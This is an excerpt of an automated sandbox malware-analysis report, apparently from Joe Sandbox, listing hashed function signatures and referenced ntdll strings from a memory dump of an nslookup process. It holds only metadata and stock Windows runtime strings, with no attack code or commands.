                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 03224787
                                  • Execute=1, xrefs: 03224713
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4540148046.0000000003180000.00000040.00001000.00020000.00000000.sdmp, Offset: 03180000, based on PE: true
                                  • Associated: 00000005.00000002.4540148046.00000000032A9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000005.00000002.4540148046.00000000032AD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000005.00000002.4540148046.000000000331E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_3180000_nslookup.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                  • API String ID: 0-484625025
                                  • Opcode ID: 926caaa10e9d97085ae6d37548e1d03d1ae90196e86da37bcbc60a69d1bc679a
                                  • Instruction ID: 955620a301755d85dc666f5d496a4db967cfbc8cd567215db65ba845793944a0
                                  • Opcode Fuzzy Hash: 926caaa10e9d97085ae6d37548e1d03d1ae90196e86da37bcbc60a69d1bc679a
                                  • Instruction Fuzzy Hash: DB512875A00719BFFF15EAA4EC89FAE77B8AF0C704F0400A9D505AB1D1D7729A818F50
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4540148046.0000000003180000.00000040.00001000.00020000.00000000.sdmp, Offset: 03180000, based on PE: true
                                  • Associated: 00000005.00000002.4540148046.00000000032A9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000005.00000002.4540148046.00000000032AD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000005.00000002.4540148046.000000000331E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_3180000_nslookup.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                  • Instruction ID: ace826c0fdd4a3f50a0fedd30e6059484503ff9de1a9bb979fa36a794848d369
                                  • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                  • Instruction Fuzzy Hash: 73023675519341AFC305EF28C490E6BBBE5EFC8704F14892DFA899B2A0DB71E945CB42
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4540148046.0000000003180000.00000040.00001000.00020000.00000000.sdmp, Offset: 03180000, based on PE: true
                                  • Associated: 00000005.00000002.4540148046.00000000032A9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000005.00000002.4540148046.00000000032AD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000005.00000002.4540148046.000000000331E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_3180000_nslookup.jbxd
                                  Similarity
                                  • API ID: __aulldvrm
                                  • String ID: +$-$0$0
                                  • API String ID: 1302938615-699404926
                                  • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                  • Instruction ID: 5de80e5584ed05d800a99209d1ba9704a491f1074f7427549f06d4c582746ce3
                                  • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                  • Instruction Fuzzy Hash: A0818074E092499FDF28CE68C8517FEBBA6AF8D360F1CC259DA51A73D1C73498818B50
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4540148046.0000000003180000.00000040.00001000.00020000.00000000.sdmp, Offset: 03180000, based on PE: true
                                  • Associated: 00000005.00000002.4540148046.00000000032A9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000005.00000002.4540148046.00000000032AD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000005.00000002.4540148046.000000000331E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_3180000_nslookup.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: %%%u$[$]:%u
                                  • API String ID: 48624451-2819853543
                                  • Opcode ID: ca107017346949e5ee5fe5981fb38aaffce868bff49ba9a9ce19078f1d628006
                                  • Instruction ID: 483ac9df5e9cd62895ba9625aaa68b502dfeb5512456a700e65915ec712b829f
                                  • Opcode Fuzzy Hash: ca107017346949e5ee5fe5981fb38aaffce868bff49ba9a9ce19078f1d628006
                                  • Instruction Fuzzy Hash: 7921867AE102199BDB10DF69C840AEEB7E8AF48640F080555E915E7241E730DA818BA0
                                  Strings
                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 032202E7
                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 032202BD
                                  • RTL: Re-Waiting, xrefs: 0322031E
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4540148046.0000000003180000.00000040.00001000.00020000.00000000.sdmp, Offset: 03180000, based on PE: true
                                  • Associated: 00000005.00000002.4540148046.00000000032A9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000005.00000002.4540148046.00000000032AD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000005.00000002.4540148046.000000000331E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_3180000_nslookup.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                  • API String ID: 0-2474120054
                                  • Opcode ID: e6e11be4a70755da057fc8439f116ca5c9a3975d7216c3ffed7326a9791dcd01
                                  • Instruction ID: b9c94bb481bb320b5f98b8bbf2a0246fc87aaa735962b889e160486a7d9d5524
                                  • Opcode Fuzzy Hash: e6e11be4a70755da057fc8439f116ca5c9a3975d7216c3ffed7326a9791dcd01
                                  • Instruction Fuzzy Hash: 0FE1E234614741EFD724CF28C884B6ABBE0BF49314F184A5DF5A68B2E1D774D986CB42
                                  Strings
                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03227B7F
                                  • RTL: Resource at %p, xrefs: 03227B8E
                                  • RTL: Re-Waiting, xrefs: 03227BAC
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4540148046.0000000003180000.00000040.00001000.00020000.00000000.sdmp, Offset: 03180000, based on PE: true
                                  • Associated: 00000005.00000002.4540148046.00000000032A9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000005.00000002.4540148046.00000000032AD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000005.00000002.4540148046.000000000331E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_3180000_nslookup.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                  • API String ID: 0-871070163
                                  • Opcode ID: cd96f08178a834b69b80bb38d553ea6b144931b01b2dc3f07655e423d06fe0ff
                                  • Instruction ID: 8c25685378264af4df416d55ab2735cd19d09ea06c96c7763213607a8e7e69b8
                                  • Opcode Fuzzy Hash: cd96f08178a834b69b80bb38d553ea6b144931b01b2dc3f07655e423d06fe0ff
                                  • Instruction Fuzzy Hash: A9410335709B029FC724CE29CC40B6AB7E5EF8D710F044A1DF956DB281D771E4858B91
                                  APIs
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0322728C
                                  Strings
                                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03227294
                                  • RTL: Resource at %p, xrefs: 032272A3
                                  • RTL: Re-Waiting, xrefs: 032272C1
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4540148046.0000000003180000.00000040.00001000.00020000.00000000.sdmp, Offset: 03180000, based on PE: true
                                  • Associated: 00000005.00000002.4540148046.00000000032A9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000005.00000002.4540148046.00000000032AD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000005.00000002.4540148046.000000000331E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_3180000_nslookup.jbxd
                                  Similarity
                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                  • API String ID: 885266447-605551621
                                  • Opcode ID: be83b5e7bca1555eee0407c4caa8dfafbb121b51346074ec8a1e55451b59ed05
                                  • Instruction ID: 78576030b4977527dcad13c82c58b56d3057551bcd85a928c61ac0b0bf5c7776
                                  • Opcode Fuzzy Hash: be83b5e7bca1555eee0407c4caa8dfafbb121b51346074ec8a1e55451b59ed05
                                  • Instruction Fuzzy Hash: B1411036718712AFC724CE28CC41B6ABBA5FF49710F144619F855EB281DB31E892CBD0
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4540148046.0000000003180000.00000040.00001000.00020000.00000000.sdmp, Offset: 03180000, based on PE: true
                                  • Associated: 00000005.00000002.4540148046.00000000032A9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000005.00000002.4540148046.00000000032AD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000005.00000002.4540148046.000000000331E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_3180000_nslookup.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: %%%u$]:%u
                                  • API String ID: 48624451-3050659472
                                  • Opcode ID: 293f33fe723434b7245c96825adf84f90a7537ee34f1dcea80289cd668487fe2
                                  • Instruction ID: a0f9a8246f61c4713950593b63e7288c3b8c60a88bf304501c170c837ed781c8
                                  • Opcode Fuzzy Hash: 293f33fe723434b7245c96825adf84f90a7537ee34f1dcea80289cd668487fe2
                                  • Instruction Fuzzy Hash: D3316676A10719DFDB20DE29DC40BEEB7B8EF44650F444956E849E7240EB309AD48BA0
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4540148046.0000000003180000.00000040.00001000.00020000.00000000.sdmp, Offset: 03180000, based on PE: true
                                  • Associated: 00000005.00000002.4540148046.00000000032A9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000005.00000002.4540148046.00000000032AD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000005.00000002.4540148046.000000000331E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_3180000_nslookup.jbxd
                                  Similarity
                                  • API ID: __aulldvrm
                                  • String ID: +$-
                                  • API String ID: 1302938615-2137968064
                                  • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                  • Instruction ID: 064cfb4858e24f35e14f4da9362a02303851d4d4ea55adb8bef7727b8ec6ed18
                                  • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                  • Instruction Fuzzy Hash: D191B270E0021A9FDF24DF69C890ABEF7A5EF4C7A0F58461AEA75E72C0D73099918750
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4540148046.0000000003180000.00000040.00001000.00020000.00000000.sdmp, Offset: 03180000, based on PE: true
                                  • Associated: 00000005.00000002.4540148046.00000000032A9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000005.00000002.4540148046.00000000032AD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000005.00000002.4540148046.000000000331E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_3180000_nslookup.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $$@
                                  • API String ID: 0-1194432280
                                  • Opcode ID: 5babf18868eaabe73382cacc2d88f480ca74a59467e501f0f5f1188d35e052b9
                                  • Instruction ID: f830db42e6bab6c68c4c20df710630817d525c2faa33b6c1638f39841e083472
                                  • Opcode Fuzzy Hash: 5babf18868eaabe73382cacc2d88f480ca74a59467e501f0f5f1188d35e052b9
                                  • Instruction Fuzzy Hash: FC814875D10269DBDB25DB54CD44BEEB7B8AF08710F0445EAEA19B7280E7709E81CFA0
                                  APIs
                                  • @_EH4_CallFilterFunc@8.LIBCMT ref: 0323CFBD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4540148046.0000000003180000.00000040.00001000.00020000.00000000.sdmp, Offset: 03180000, based on PE: true
                                  • Associated: 00000005.00000002.4540148046.00000000032A9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000005.00000002.4540148046.00000000032AD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000005.00000002.4540148046.000000000331E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_3180000_nslookup.jbxd
                                  Similarity
                                  • API ID: CallFilterFunc@8
                                  • String ID: @$@4Cw@4Cw
                                  • API String ID: 4062629308-3101775584
                                  • Opcode ID: 3ff3d0b35d191b9c6af7a5a69b49d704a78a3e8aaa3cdbd416e2ecc1b1dd631a
                                  • Instruction ID: f9df77bb1e2ce60ecd1ce68c6af973a271ba2bd0b1188d0ac307b929de3c5cc0
                                  • Opcode Fuzzy Hash: 3ff3d0b35d191b9c6af7a5a69b49d704a78a3e8aaa3cdbd416e2ecc1b1dd631a
                                  • Instruction Fuzzy Hash: B941BEB5A20765DFCB21DFA9C840AAEFBB8FF49B10F04442AE914DB254D774D881CB60